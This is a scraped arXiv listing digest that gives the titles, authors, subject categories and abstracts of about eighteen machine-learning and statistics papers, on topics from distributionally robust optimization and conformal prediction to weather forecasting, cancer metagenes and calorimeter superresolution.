Abstract:We study finite-sample statistical performance guarantees for distributionally robust optimization (DRO) with optimal transport (OT) and OT-regularized divergence model neighborhoods. Specifically, we derive concentration inequalities for supervised learning via DRO-based adversarial training, as commonly employed to enhance the adversarial robustness of machine learning models. Our results apply to a wide range of OT cost functions, beyond the p-Wasserstein case studied by previous authors. In particular, our results are the first to: 1) cover soft-constraint norm-ball OT cost functions; soft-constraint costs have been shown empirically to enhance robustness when used in adversarial training, 2) apply to the combination of adversarial sample generation and adversarial reweighting that is induced by using OT-regularized f-divergence model neighborhoods; the added reweighting mechanism has also been shown empirically to further improve performance. In addition, even in the p-Wasserstein case, our bounds exhibit better behavior as a function of the DRO neighborhood size than previous results when applied to the adversarial setting.
[LG-126] Empirical Likelihood for Nonsmooth Functionals
链接: https://arxiv.org/abs/2603.27743
作者: Hongseok Namkoong
类目: Methodology (stat.ME); Machine Learning (cs.LG)
*备注:
Abstract:Empirical likelihood is an attractive inferential framework that respects natural parameter boundaries, but existing approaches typically require smoothness of the functional and miscalibrate substantially when these assumptions are violated. For the optimal-value functional central to policy evaluation, smoothness holds only when the optimum is unique – a condition that fails exactly when rigorous inference is most needed where more complex policies have modest gains. In this work, we develop a bootstrap empirical likelihood method for partially nonsmooth functionals. Our analytic workhorse is a geometric reduction of the profile likelihood to the distance between the score mean and a level set whose shape (a tangent cone given by nonsmoothness patterns) determines the asymptotic distribution. Unlike the classical proof technology based on Taylor expansions on the dual optima, our geometric approach leverages properties of a deterministic convex program and can directly apply to nonsmooth functionals. Since the ordinary bootstrap is not valid in the presence of nonsmoothness, we derive a corrected multiplier bootstrap approach that adapts to the unknown level-set geometry.
[LG-127] Energy Score-Guided Neural Gaussian Mixture Model for Predictive Uncertainty Quantification
链接: https://arxiv.org/abs/2603.27672
作者: Yang Yang,Chunlin Ji,Haoyang Li,Ke Deng
类目: Machine Learning (stat.ML); Machine Learning (cs.LG)
*备注: 39 pages, 5 figures
Abstract:Quantifying predictive uncertainty is essential for real world machine learning applications, especially in scenarios requiring reliable and interpretable predictions. Many common parametric approaches rely on neural networks to estimate distribution parameters by optimizing the negative log likelihood. However, these methods often encounter challenges like training instability and mode collapse, leading to poor estimates of the mean and variance of the target output distribution. In this work, we propose the Neural Energy Gaussian Mixture Model (NE-GMM), a novel framework that integrates Gaussian Mixture Model (GMM) with Energy Score (ES) to enhance predictive uncertainty quantification. NE-GMM leverages the flexibility of GMM to capture complex multimodal distributions and leverages the robustness of ES to ensure well calibrated predictions in diverse scenarios. We theoretically prove that the hybrid loss function satisfies the properties of a strictly proper scoring rule, ensuring alignment with the true data distribution, and establish generalization error bounds, demonstrating that the model’s empirical performance closely aligns with its expected performance on unseen data. Extensive experiments on both synthetic and real world datasets demonstrate the superiority of NE-GMM in terms of both predictive accuracy and uncertainty quantification.
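The energy score used for training can be illustrated with its standard sample-based estimator in one dimension; the paper's multivariate ES replaces the absolute differences below with Euclidean norms:

```python
def energy_score_1d(samples, y):
    """Standard sample-based energy score for a scalar observation y and
    predictive samples x_1..x_m:
    ES = (1/m) sum |x_i - y| - (1/(2 m^2)) sum_ij |x_i - x_j|.
    Lower is better; the score is strictly proper."""
    m = len(samples)
    term1 = sum(abs(x - y) for x in samples) / m
    term2 = sum(abs(a - b) for a in samples for b in samples) / (2 * m * m)
    return term1 - term2

es = energy_score_1d([0.0, 2.0], 1.0)  # term1 = 1.0, term2 = 0.5 -> 0.5
```

In NE-GMM the predictive samples would be drawn from the fitted Gaussian mixture, so minimizing this estimator aligns the mixture with the true data distribution.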
[LG-128] StretchCast: Global-Regional AI Weather Forecasting on Stretched Cubed-Sphere Mesh
链接: https://arxiv.org/abs/2603.27288
作者: Jin Feng
类目: Atmospheric and Oceanic Physics (physics.ao-ph); Machine Learning (cs.LG)
*备注:
Abstract:Global AI weather forecasting still relies mainly on uniform-resolution models, making it hard to combine regional refinement, two-way regional-global coupling, and affordable training cost. We introduce StretchCast, a global-regional AI forecasting framework built on a variable-resolution stretched cubed-sphere (SCS) mesh that preserves a closed global domain while concentrating resolution over a target region. Within this framework, we develop a one-step predictor, SCS_Base Model, and a rollout-oriented multistep predictor, SCS_FCST4 Model, to test the feasibility of SCS-based forecasting and the benefit of joint multistep training. Experiments use ERA5 with 69 variables over 1998-2022. Because training compute remains limited, this study uses a coarse-resolution proof-of-concept configuration rather than a final high-resolution system. Even with only about 7,776 effective global grid cells and roughly 0.875 degree resolution over the center-refined face, the 23M-parameter SCS_Base Model yields stable multivariate forecasts. With 83M parameters and training cost on the order of hours, SCS_FCST4 Model delivers competitive medium-range anomaly-correlation evolution over the target region after unified reprojection, especially for geopotential height, specific humidity, and part of the lower-tropospheric winds, while maintaining smooth cross-face continuity and realistic multiscale structure in typhoon and spectral analyses. These results support StretchCast as a practical lightweight foundation for global-regional AI weather forecasting.
[LG-129] Conformal Prediction Assessment: A Framework for Conditional Coverage Evaluation and Selection
链接: https://arxiv.org/abs/2603.27189
作者: Zheng Zhou,Xiangfei Zhang,Chongguang Tao,Yuhong Yang
类目: Methodology (stat.ME); Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:Conformal prediction provides rigorous distribution-free finite-sample guarantees for marginal coverage under the assumption of exchangeability, but may exhibit systematic undercoverage or overcoverage for specific subpopulations. Assessing conditional validity is challenging, as standard stratification methods suffer from the curse of dimensionality. We propose Conformal Prediction Assessment (CPA), a framework that reframes the evaluation of conditional coverage as a supervised learning task by training a reliability estimator that predicts instance-level coverage probabilities. Building on this estimator, we introduce the Conditional Validity Index (CVI), which decomposes reliability into safety (undercoverage risk) and efficiency (overcoverage cost). We establish convergence rates for the reliability estimator and prove the consistency of CVI-based model selection. Extensive experiments on synthetic and real-world datasets demonstrate that CPA effectively diagnoses local failure modes and that CC-Select, our CVI-based model selection algorithm, consistently identifies predictors with superior conditional coverage performance.
[LG-130] Pan-Cancer Mapping of the Tumor Immune Landscape through Metagene Clustering and Predictive Modeling
链接: https://arxiv.org/abs/2603.27145
作者: Soham Chatterjee
类目: Genomics (q-bio.GN); Machine Learning (cs.LG)
*备注: 21 pages, 4 figures
Abstract:As immunotherapies become standard cancer treatments, it is increasingly important to identify a patient’s immune profile, which encompasses the activity of immune cells within the tumor microenvironment and the presence of specific biomarkers. However, despite advances in immune profiling with high-throughput sequencing, we lack mechanistic explanations of the drivers of immune phenotypes. This study aimed to identify novel, robust immune-related gene clusters (metagenes) and evaluate their prognostic significance and functional relevance across various pan-cancer types using a comprehensive computational pipeline. We acquired pan-cancer bulk RNA-seq and established immune subtypes from The Cancer Genome Atlas (TCGA). Using expression-based filtering and clustering of genes with ANOVA and Gaussian Mixture Model (GMM), we identified 48 unique metagenes. These metagenes achieved 87% accuracy in predicting the established subtypes. SHAP analysis revealed the most predictive metagenes per subtype, while functional enrichment analysis identified their associated pathways. Genes were ranked by differential expression between high- and low-expression groups. The metagenes revealed insights, including co-expression of immune activation and regulatory factors, links between cell cycle regulation and immune evasion, and dynamic microenvironment remodeling signatures. Kaplan-Meier survival analysis and multivariate Cox Regression revealed that many metagenes had prognostic value for overall survival. Overall, the metagenes represent coordinated biological programs across diverse cancer types, providing a foundation for developing robust, broadly applicable immuno-oncology biomarkers that extend beyond single-gene markers. They demonstrate prognostic value across cancer types and hold potential to guide immunotherapy treatment decisions.
[LG-131] Forecastability as an Information-Theoretic Limit on Prediction
链接: https://arxiv.org/abs/2603.27074
作者: Peter Maurice Catt
类目: Applications (stat.AP); Information Theory (cs.IT); Machine Learning (cs.LG); Machine Learning (stat.ML)
*备注:
Abstract:Forecasting is usually framed as a problem of model choice. This paper starts earlier, asking how much predictive information is available at each horizon. Under logarithmic loss, the answer is exact: the mutual information between the future observation and the declared information set equals the maximum achievable reduction in expected loss. This paper develops the consequences of that identity. Forecastability, defined as this mutual information evaluated across horizons, forms a profile whose shape reflects the dependence structure of the process and need not be monotone. Three structural properties are derived: compression of the information set can only reduce forecastability; the gap between the profile under a finite lag window and the full history gives an exact truncation error budget; and for processes with periodic dependence, the profile inherits the periodicity. Predictive loss decomposes into an irreducible component fixed by the information structure and an approximation component attributable to the method; their ratio defines the exploitation ratio, a normalised diagnostic for method adequacy. The exact equality is specific to log loss, but when forecastability is near zero, classical inequalities imply that no method under any loss can materially improve on the unconditional baseline. The framework provides a theoretical foundation for assessing, prior to any modelling, whether the declared information set contains sufficient predictive information at the horizon of interest.
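The central identity — mutual information between the future observation and the information set equals the maximal reduction in expected log loss — can be checked numerically on a small discrete joint distribution, since I(X;Y) = H(Y) - H(Y|X):

```python
import math

def entropy(p):
    """Shannon entropy in nats, i.e. the expected log loss of the
    best forecast under distribution p."""
    return -sum(q * math.log(q) for q in p if q > 0)

# Joint pmf over (signal x, outcome y); rows index x, columns index y
joint = [[0.4, 0.1],
         [0.1, 0.4]]

py = [sum(row[j] for row in joint) for j in range(2)]  # marginal of y
baseline_loss = entropy(py)                            # H(Y): no information
cond_loss = sum(sum(row) * entropy([v / sum(row) for v in row])
                for row in joint)                      # H(Y|X): with the signal
mutual_info = baseline_loss - cond_loss                # I(X;Y), the
                                                       # forecastability
```

When `mutual_info` is near zero, no method can materially beat the unconditional baseline, which is the pre-modelling diagnostic the paper advocates.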
[LG-132] On the Loss Landscape Geometry of Regularized Deep Matrix Factorization: Uniqueness and Sharpness
链接: https://arxiv.org/abs/2603.27072
作者: Anil Kamber,Rahul Parhi
类目: Machine Learning (stat.ML); Machine Learning (cs.LG)
*备注: 32 pages, 3 figures
Abstract:Weight decay is ubiquitous in training deep neural network architectures. Its empirical success is often attributed to capacity control; nonetheless, our theoretical understanding of its effect on the loss landscape and the set of minimizers remains limited. In this paper, we show that \ell^2-regularized deep matrix factorization/deep linear network training problems with squared-error loss admit a unique end-to-end minimizer for all target matrices subject to factorization, except for a set of Lebesgue measure zero formed by the depth and the regularization parameter. This observation reveals fundamental properties of the loss landscape of regularized deep matrix factorization problems: the Hessian spectrum is constant across all minimizers of the regularized deep scalar factorization problem with squared-error loss. Moreover, we show that, in regularized deep matrix factorization problems with squared-error loss, if the target matrix does not belong to the Lebesgue measure-zero set, then the Frobenius norm of each layer is constant across all minimizers. This, in turn, yields a global lower bound on the trace of the Hessian evaluated at any minimizer of the regularized deep matrix factorization problem. Furthermore, we establish a critical threshold for the regularization parameter above which the unique end-to-end minimizer collapses to zero.
[LG-133] Overcoming the Incentive Collapse Paradox
链接: https://arxiv.org/abs/2603.27049
作者: Qichuan Yin,Ziwei Su,Shuangning Li
类目: Machine Learning (stat.ML); Machine Learning (cs.LG)
*备注:
Abstract:AI-assisted task delegation is increasingly common, yet human effort in such systems is costly and typically unobserved. Recent work by Bastani and Cachon (2025); Sambasivan et al. (2021) shows that accuracy-based payment schemes suffer from incentive collapse: as AI accuracy improves, sustaining positive human effort requires unbounded payments. We study this problem in a budget-constrained principal-agent framework with strategic human agents whose output accuracy depends on unobserved effort. We propose a sentinel-auditing payment mechanism that enforces a strictly positive and controllable level of human effort at finite cost, independent of AI accuracy. Building on this incentive-robust foundation, we develop an incentive-aware active statistical inference framework that jointly optimizes (i) the auditing rate and (ii) active sampling and budget allocation across tasks of varying difficulty to minimize the final statistical loss under a single budget. Experiments demonstrate improved cost-error tradeoffs relative to standard active learning and auditing-only baselines.
[LG-134] Material Identification using Multi-Modal Intrinsic Radiation and Radiography
链接: https://arxiv.org/abs/2603.27036
作者: Khoa Nguyen,Brendt Wohlberg,Oleg Korobkin,Marc Klasky
类目: Instrumentation and Detectors (physics.ins-det); Machine Learning (cs.LG)
*备注:
Abstract:We investigate multi-modal material identification for special nuclear material (SNM) configurations using a combination of X-ray radiography, high-resolution \gamma-ray spectroscopy, and neutron multiplicity measurements. We consider a Beryllium Reflected Plutonium sphere (BeRP) ball surrounded by one or two concentric shielding shells of unknown composition whose radii are assumed known from radiography. High-purity germanium (HPGe) spectra are reduced to net counts in selected Pu-239 photo-peaks, while neutron multiplicity information is summarized by Feynman variances Y2 and Y3 computed from factorial moments of the neutron counting statistics. Using synthetic data generated with the Gamma Detector Response and Analysis Software (GADRAS) for a range of shielding materials and thicknesses, we cast the material identification problem as a supervised multi-class classification task over all admissible shell-material combinations. We demonstrate that a random forest classifier trained on combined gamma and neutron features achieves almost perfect identification accuracy for single-shell cases, and substantial performance gains for more challenging double-shell configurations relative to gamma-only classification. Alternative statistical and machine-learning formulations for this multi-class problem are examined, along with the impact of model mismatch between the forward model and the test cases, as given by variations in the statistical noise. Opportunities for extending the approach to more complex geometries and experimental data are also discussed.
[LG-135] Parameter Estimation in Stochastic Differential Equations via Wiener Chaos Expansion and Stochastic Gradient Descent
链接: https://arxiv.org/abs/2603.27019
作者: Francisco Delgado-Vences,José Julián Pavón-Español,Arelly Ornelas
类目: Machine Learning (stat.ML); Machine Learning (cs.LG); Probability (math.PR); Methodology (stat.ME)
*备注: 25 pages, 3 figures. This manuscript has been submitted to Applied Mathematical Modelling for publication
Abstract:This study addresses the inverse problem of parameter estimation for Stochastic Differential Equations (SDEs) by minimizing a regularized discrepancy functional via Stochastic Gradient Descent (SGD). To achieve computational efficiency, we leverage the Wiener Chaos Expansion (WCE), a spectral decomposition technique that projects the stochastic solution onto an orthogonal basis of Hermite polynomials. This transformation effectively maps the stochastic dynamics into a hierarchical system of deterministic functions, termed the propagator. By reducing the stochastic inference task to a deterministic optimization problem, our framework circumvents the heavy computational burden and sampling requirements of traditional simulation-based methods like MCMC or MLE. The robustness and scalability of the proposed approach are demonstrated through numerical experiments on various non-linear SDEs, including models for individual biological growth. Results show that the WCE-SGD framework provides accurate parameter recovery even from discrete, noisy observations, offering a significant paradigm shift in the efficient modeling of complex stochastic systems.
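The Hermite-polynomial basis underlying the Wiener Chaos Expansion can be generated with the standard three-term recurrence; this is a generic construction of the basis, not the paper's specific propagator system:

```python
def hermite_prob(n, x):
    """Probabilists' Hermite polynomial He_n(x), via the recurrence
    He_{n+1}(x) = x * He_n(x) - n * He_{n-1}(x),
    with He_0 = 1 and He_1 = x. These polynomials are orthogonal under the
    standard Gaussian measure, which is what makes them the natural basis
    for Wiener chaos expansions."""
    h_prev, h = 1.0, x
    if n == 0:
        return h_prev
    for k in range(1, n):
        h_prev, h = h, x * h - k * h_prev
    return h

# He_2(x) = x^2 - 1, He_3(x) = x^3 - 3x
```

Projecting the SDE solution onto products of these polynomials in the underlying Gaussian noise yields the deterministic coefficient system that SGD then optimizes.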
[LG-136] On-Device Super Resolution Imaging Using Low-Cost SPAD Array and Embedded Lightweight Deep Learning
链接: https://arxiv.org/abs/2603.27018
作者: Zhenya Zang,Xingda Li,David Day Uei Li
类目: Image and Video Processing (eess.IV); Machine Learning (cs.LG)
*备注:
Abstract:This work presents a lightweight super-resolution (LiteSR) neural network for depth and intensity images acquired from a consumer-grade single-photon avalanche diode (SPAD) array with a 48x32 spatial resolution. The proposed framework reconstructs high-resolution (HR) images of size 256x256. Both synthetic and real datasets are used for performance evaluation. Extensive quantitative metrics demonstrate high reconstruction fidelity on synthetic datasets, while experiments on real indoor and outdoor measurements further confirm the robustness of the proposed approach. Moreover, the SPAD sensor is interfaced with an Arduino UNO Q microcontroller, which receives low-resolution (LR) depth and intensity images and feeds them into a compressed, pre-trained deep learning (DL) model, enabling real-time SR video streaming. In addition to the 256x256 setting, a range of target HR resolutions is evaluated to determine the maximum achievable upscaling resolution (512x512) with LiteSR, including scenarios with noise-corrupted LR inputs. The proposed LiteSR-embedded system co-design provides a scalable, cost-effective solution to enhance the spatial resolution of current consumer-grade SPAD arrays to meet HR imaging requirements.
[LG-137] Graph Attention Network-Based Detection of Autism Spectrum Disorder
链接: https://arxiv.org/abs/2603.26971
作者: Abigail Kelly,Ramchandra Rimal,Arpan Sainju
类目: Applications (stat.AP); Machine Learning (cs.LG)
*备注:
Abstract:Autism Spectrum Disorder (ASD) is a neurodevelopmental condition characterized by atypical brain connectivity. One of the crucial steps in addressing ASD is its early detection. This study introduces a novel computational framework that employs an Attention-Based Graph Convolutional Network, referred to as the GATGraphClassifier, for detecting ASD. We utilize Functional Magnetic Resonance Imaging (fMRI) data from the Autism Brain Imaging Data Exchange (ABIDE) repository to construct functional connectivity matrices using Pearson correlation, which captures interactions between various brain regions. These matrices are then transformed into graph representations, where the nodes and edges represent the brain regions and functional connections, respectively. The GATGraphClassifier employs attention mechanisms to identify critical connectivity patterns, thereby enhancing the model’s interpretability and diagnostic accuracy. Our proposed framework demonstrates superior performance across all standard classification metrics compared to existing state-of-the-art methods. Notably, we achieved an average accuracy of 88.79% on the test data over 30 independent runs, surpassing the benchmark model’s performance by 12.27%. In addition, we identified the crucial brain regions associated with ASD, consistent with the previous studies, and a few novel regions. This study not only contributes to the advancement of ASD detection but also shows the potential for broader adaptability of GATGraphClassifier in analyzing complex relational data in various fields, where understanding intricate connectivity and interaction patterns is essential.
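The first stage of the pipeline — turning Pearson-correlation connectivity matrices into graphs — can be sketched as follows; the 0.5 threshold is an illustrative assumption, not necessarily the paper's edge-construction rule:

```python
import math

def pearson(a, b):
    """Pearson correlation between two equal-length time series."""
    n = len(a)
    ma, mb = sum(a) / n, sum(b) / n
    cov = sum((x - ma) * (y - mb) for x, y in zip(a, b))
    sa = math.sqrt(sum((x - ma) ** 2 for x in a))
    sb = math.sqrt(sum((y - mb) ** 2 for y in b))
    return cov / (sa * sb)

def connectivity_graph(series, threshold=0.5):
    """Edge list over brain regions whose fMRI time series correlate above
    a threshold in absolute value (illustrative cutoff)."""
    n = len(series)
    return [(i, j) for i in range(n) for j in range(i + 1, n)
            if abs(pearson(series[i], series[j])) > threshold]

regions = [[1.0, 2.0, 3.0, 4.0],   # region 0
           [2.0, 4.0, 6.0, 8.0],   # perfectly correlated with region 0
           [4.0, 1.0, 3.0, 2.0]]   # weakly related (|r| = 0.4)
edges = connectivity_graph(regions)
```

The resulting graph (nodes = regions, edges = strong functional connections) is what the attention-based classifier then operates on.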
[LG-138] Static and Dynamic Approaches to Computing Barycenters of Probability Measures on Graphs
链接: https://arxiv.org/abs/2603.26940
作者: David Gentile,James M. Murphy
类目: Machine Learning (stat.ML); Machine Learning (cs.LG); Probability (math.PR)
*备注: 31 pages, 17 figures, 1 table
Abstract:The optimal transportation problem defines a geometry of probability measures which leads to a definition for weighted averages (barycenters) of measures, finding application in the machine learning and computer vision communities as a signal processing tool. Here, we implement a barycentric coding model for measures which are supported on a graph, a context in which the classical optimal transport geometry becomes degenerate, by leveraging a Riemannian structure on the simplex induced by a dynamic formulation of the optimal transport problem. We approximate the exponential mapping associated to the Riemannian structure, as well as its inverse, by utilizing past approaches which compute action minimizing curves in order to numerically approximate transport distances for measures supported on discrete spaces. Intrinsic gradient descent is then used to synthesize barycenters, wherein gradients of a variance functional are computed by approximating geodesic curves between the current iterate and the reference measures; iterates are then pushed forward via a discretization of the continuity equation. Analysis of measures with respect to a given dictionary of references is performed by solving a quadratic program formed by computing geodesics between target and reference measures. We compare our novel approach to one based on entropic regularization of the static formulation of the optimal transport problem where the graph structure is encoded via graph distance functions, we present numerical experiments validating our approach, and we conclude that intrinsic gradient descent on the probability simplex provides a coherent framework for the synthesis and analysis of measures supported on graphs.
[LG-139] Koopman Operator Identification of Model Parameter Trajectories for Temporal Domain Generalization (KOMET)
链接: https://arxiv.org/abs/2603.26923
作者: Randy C. Hoover,Jacob James,Paul May,Kyle Caudle
类目: Machine Learning (stat.ML); Machine Learning (cs.LG); Dynamical Systems (math.DS)
*备注:
Abstract:Parametric models deployed in non-stationary environments degrade as the underlying data distribution evolves over time (a phenomenon known as temporal domain drift). In the current work, we present KOMET (Koopman Operator identification of Model parameter Evolution under Temporal drift), a model-agnostic, data-driven framework that treats the sequence of trained parameter vectors as the trajectory of a nonlinear dynamical system and identifies its governing linear operator via Extended Dynamic Mode Decomposition (EDMD). A warm-start sequential training protocol enforces parameter-trajectory smoothness, and a Fourier-augmented observable dictionary exploits the periodic structure inherent in many real-world distribution drifts. Once identified, KOMET’s Koopman operator predicts future parameter trajectories autonomously, without access to future labeled data, enabling zero-retraining adaptation at deployment. Evaluated on six datasets spanning rotating, oscillating, and expanding distribution geometries, KOMET achieves mean autonomous-rollout accuracies between 0.981 and 1.000 over 100 held-out time steps. Spectral and coupling analyses further reveal interpretable dynamical structure consistent with the geometry of the drifting decision boundary.
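In the single-observable case, the EDMD identification step reduces to a scalar least-squares fit of the operator along the parameter trajectory. This toy sketch omits KOMET's Fourier-augmented dictionary and matrix-valued operator:

```python
def edmd_scalar(xs, g):
    """One-observable EDMD: least-squares fit of the scalar K minimizing
    sum_t (g(x_{t+1}) - K * g(x_t))^2 along a trajectory x_0, x_1, ...
    The closed form is K = <g(x_{t+1}), g(x_t)> / <g(x_t), g(x_t)>."""
    gx = [g(x) for x in xs[:-1]]
    gy = [g(x) for x in xs[1:]]
    num = sum(a * b for a, b in zip(gx, gy))
    den = sum(a * a for a in gx)
    return num / den

# A geometric trajectory x_{t+1} = 0.5 * x_t is exactly linear in g(x) = x,
# so EDMD recovers the multiplier 0.5
traj = [8.0, 4.0, 2.0, 1.0]
K = edmd_scalar(traj, lambda x: x)
```

With the operator identified, future parameter values follow by iterating `K` on the observables, which is the zero-retraining rollout the abstract describes.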
[LG-140] Comparing Physics-Informed and Neural ODE Approaches for Modeling Nonlinear Biological Systems: A Case Study Based on the Morris-Lecar Model
链接: https://arxiv.org/abs/2603.26921
作者: Nikolaos M. Matzakos,Chrisovalantis Sfyrakis
类目: Dynamical Systems (math.DS); Machine Learning (cs.LG)
*备注: 25 pages, 11 figures
Abstract:Physics-Informed Neural Networks (PINNs) and Neural Ordinary Differential Equations (NODEs) represent two distinct machine learning frameworks for modeling nonlinear neuronal dynamics. This study systematically evaluates their performance on the two-dimensional Morris-Lecar model across three canonical bifurcation regimes: Hopf, Saddle-Node on Limit Cycle, and homoclinic orbit. Synthetic time-series data are generated via numerical integration under controlled conditions, and training is performed using collocation points for PINNs and adaptive solvers for NODEs (Dormand-Prince method). PINNs incorporate the governing differential equations into the loss function using automatic differentiation, which enforces physical consistency during training. In contrast, NODEs learn the system’s vector field directly from data, without prior structural assumptions or inductive bias toward physical laws. Model performance is assessed using standard regression metrics, including Mean Squared Error (MSE), Mean Absolute Error (MAE), Mean Absolute Percentage Error (MAPE), and the coefficient of determination. Results indicate that PINNs tend to achieve higher accuracy and robustness in scenarios involving stiffness or sensitive bifurcations, owing to their embedded physical structure. NODEs, while more expressive and flexible, operate as black-box approximators without structural constraints, which can lead to reduced interpretability and stability in these regimes. Although advanced variants of NODEs (e.g., ANODEs, latent NODEs) aim to mitigate such limitations, their performance under stiff dynamics remains an open question. These findings emphasize the trade-offs between physics-informed models, which embed structure and interpretability, and purely data-driven approaches, which prioritize flexibility at the cost of physical consistency. 
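The evaluation metrics listed in the abstract (MSE, MAE, MAPE, and the coefficient of determination) are standard and can be computed directly:

```python
def regression_metrics(y_true, y_pred):
    """MSE, MAE, MAPE (in %), and R^2 for paired predictions.
    MAPE assumes nonzero targets."""
    n = len(y_true)
    mse = sum((t - p) ** 2 for t, p in zip(y_true, y_pred)) / n
    mae = sum(abs(t - p) for t, p in zip(y_true, y_pred)) / n
    mape = 100.0 * sum(abs((t - p) / t) for t, p in zip(y_true, y_pred)) / n
    mean_t = sum(y_true) / n
    ss_tot = sum((t - mean_t) ** 2 for t in y_true)
    r2 = 1.0 - (mse * n) / ss_tot  # 1 - SS_res / SS_tot
    return mse, mae, mape, r2

# Perfect prediction: zero errors and R^2 = 1
mse, mae, mape, r2 = regression_metrics([1.0, 2.0, 3.0], [1.0, 2.0, 3.0])
```

These are the same metrics on which the PINN and NODE trajectories are compared across the three bifurcation regimes.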
MSC classes: 68T07, 65L05, 92B20, 34C23. Cite as: arXiv:2603.26921 [math.DS]. Submitted Fri, 27 Mar 2026 18:53:53 UTC.
[LG-141] Calorimeter Shower Superresolution with Conditional Normalizing Flows: Implementation and Statistical Evaluation
Link: https://arxiv.org/abs/2603.26813
Authors: Andrea Cosso
Subjects: Instrumentation and Detectors (physics.ins-det); Machine Learning (cs.LG); Machine Learning (stat.ML)
Comments: Master's thesis. arXiv admin note: text overlap with arXiv:2409.16336 by other authors
Abstract:In High Energy Physics, detailed calorimeter simulations and reconstructions are essential for accurate energy measurements and particle identification, but their high granularity makes them computationally expensive. Developing data-driven techniques capable of recovering fine-grained information from coarser readouts, a task known as calorimeter superresolution, offers a promising way to reduce both computational and hardware costs while preserving detector performance. This thesis investigates whether a generative model originally designed for fast simulation can be effectively applied to calorimeter superresolution. Specifically, the model proposed in arXiv:2308.11700 is re-implemented independently and trained on the CaloChallenge 2022 dataset based on the Geant4 Par04 calorimeter geometry. Finally, the model’s performance is assessed through a rigorous statistical evaluation framework, following the methodology introduced in arXiv:2409.16336, to quantitatively test its ability to reproduce the reference distributions.
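The conditional normalizing flow at the heart of this approach is typically built from invertible coupling blocks conditioned on the coarse readout. A generic conditional affine coupling step (a standard flow building block, not the specific architecture of arXiv:2308.11700) can be sketched as follows; the toy dimensions and the single-layer conditioner network are assumptions for illustration:

```python
import numpy as np

rng = np.random.default_rng(0)

def coupling_forward(x, cond, W, b):
    """One conditional affine coupling step: the first half of x passes
    through unchanged; the second half is scaled and shifted by a small
    network fed with (first half, conditioning vector)."""
    d = x.shape[-1] // 2
    x1, x2 = x[..., :d], x[..., d:]
    h = np.tanh(np.concatenate([x1, cond], axis=-1) @ W + b)
    s, t = h[..., :d], h[..., d:2 * d]
    y2 = x2 * np.exp(s) + t
    log_det = s.sum(axis=-1)  # log |det Jacobian|, needed for the flow's likelihood
    return np.concatenate([x1, y2], axis=-1), log_det

def coupling_inverse(y, cond, W, b):
    """Exact inverse: recompute (s, t) from the untouched half, undo the affine map."""
    d = y.shape[-1] // 2
    y1, y2 = y[..., :d], y[..., d:]
    h = np.tanh(np.concatenate([y1, cond], axis=-1) @ W + b)
    s, t = h[..., :d], h[..., d:2 * d]
    x2 = (y2 - t) * np.exp(-s)
    return np.concatenate([y1, x2], axis=-1)

# Toy sizes: an 8-dim "fine" shower slice conditioned on a 4-dim coarse readout.
d, c = 4, 4
W = rng.normal(scale=0.3, size=(d + c, 2 * d))
b = np.zeros(2 * d)
x = rng.normal(size=(5, 2 * d))
cond = rng.normal(size=(5, c))
y, log_det = coupling_forward(x, cond, W, b)
x_rec = coupling_inverse(y, cond, W, b)
```

Stacking such blocks (with permutations between them) yields an invertible map from coarse-conditioned noise to fine-grained showers, trainable by maximum likelihood via the accumulated `log_det` terms.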
[LG-142] Interpretable liquid crystal phase classification via two-by-two ordinal patterns
Link: https://arxiv.org/abs/2603.26723
Authors: Leonardo G. J. M. Voltarelli, Natalia Osiecka-Drewniak, Marcin Piwowarczyk, Ewa Juszynska-Galazka, Rafael S. Zola, Matjaz Perc, Haroldo V. Ribeiro
Subjects: Soft Condensed Matter (cond-mat.soft); Machine Learning (cs.LG)
Comments: 16 two-column pages, 8 figures, supplementary information; accepted for publication in Physical Review E
Abstract:Liquid crystal textures encode rich structural information, yet mapping these images to mesophase identity remains challenging because visually similar patterns can arise from distinct structures. Here we present a simple, interpretable representation that maps textures to a 75-dimensional frequency vector of two-by-two ordinal patterns, grouped into eleven symmetry-based types to characterize a large-scale dataset spanning seven mesophases. Combined with a simple machine learning classifier, this lightweight representation yields near-perfect phase recognition, including the difficult distinction between smectic A and smectic B mesophases. Our approach generalizes to unseen compounds and accurately distinguishes between phase identity and material origin. Unlike deep learning methods, each ordinal pattern is readily interpretable, and model explanations augmented with network visualizations of pattern interactions reveal the specific types and pairwise dependencies that drive each mesophase decision, providing compact, physically meaningful summaries of texture determinants. These results establish two-by-two ordinal patterns as an interpretable and scalable tool for liquid crystal image analysis, with potential applications to other complex patterned systems in materials science.
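The 2×2 ordinal-pattern representation can be sketched directly: each 2×2 patch is mapped to the rank ordering of its four pixels with ties allowed (at most 75 distinct patterns, the ordered Bell number for four elements), and a texture is summarized by the pattern frequencies. A minimal sketch of the feature extraction, not the authors' implementation:

```python
import numpy as np
from collections import Counter

def ordinal_pattern(patch):
    """Map a 2x2 patch to its tie-aware rank pattern (dense ranks):
    equal pixel values share a rank, so e.g. a constant patch -> (0,0,0,0)."""
    vals = patch.ravel()
    uniq = np.unique(vals)              # sorted distinct values
    ranks = np.searchsorted(uniq, vals) # dense rank of each pixel
    return tuple(int(r) for r in ranks)

def pattern_frequencies(img):
    """Frequency vector of 2x2 ordinal patterns over all overlapping patches."""
    h, w = img.shape
    counts = Counter()
    for i in range(h - 1):
        for j in range(w - 1):
            counts[ordinal_pattern(img[i:i + 2, j:j + 2])] += 1
    total = sum(counts.values())
    return {p: c / total for p, c in counts.items()}

# A monotone gradient image: every patch has the same strict ordering.
gradient = np.arange(9, dtype=float).reshape(3, 3)
freqs = pattern_frequencies(gradient)
```

The resulting (at most) 75-dimensional frequency vector is the lightweight, interpretable feature the paper feeds to a simple classifier; the symmetry-based grouping into eleven types would be a further mapping on these pattern keys.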
[LG-143] FEMBA on the Edge: Physiologically-Aware Pre-Training Quantization and Deployment of a Bidirectional Mamba EEG Foundation Model on an Ultra-low Power Microcontroller
Link: https://arxiv.org/abs/2603.26716
Authors: Anna Tegon, Nicholas Lehmann, Yawei Li, Andrea Cossettini, Luca Benini, Thorir Mar Ingolfsson
Subjects: Signal Processing (eess.SP); Machine Learning (cs.LG)
Comments: 10 pages, 9 tables, 1 figure
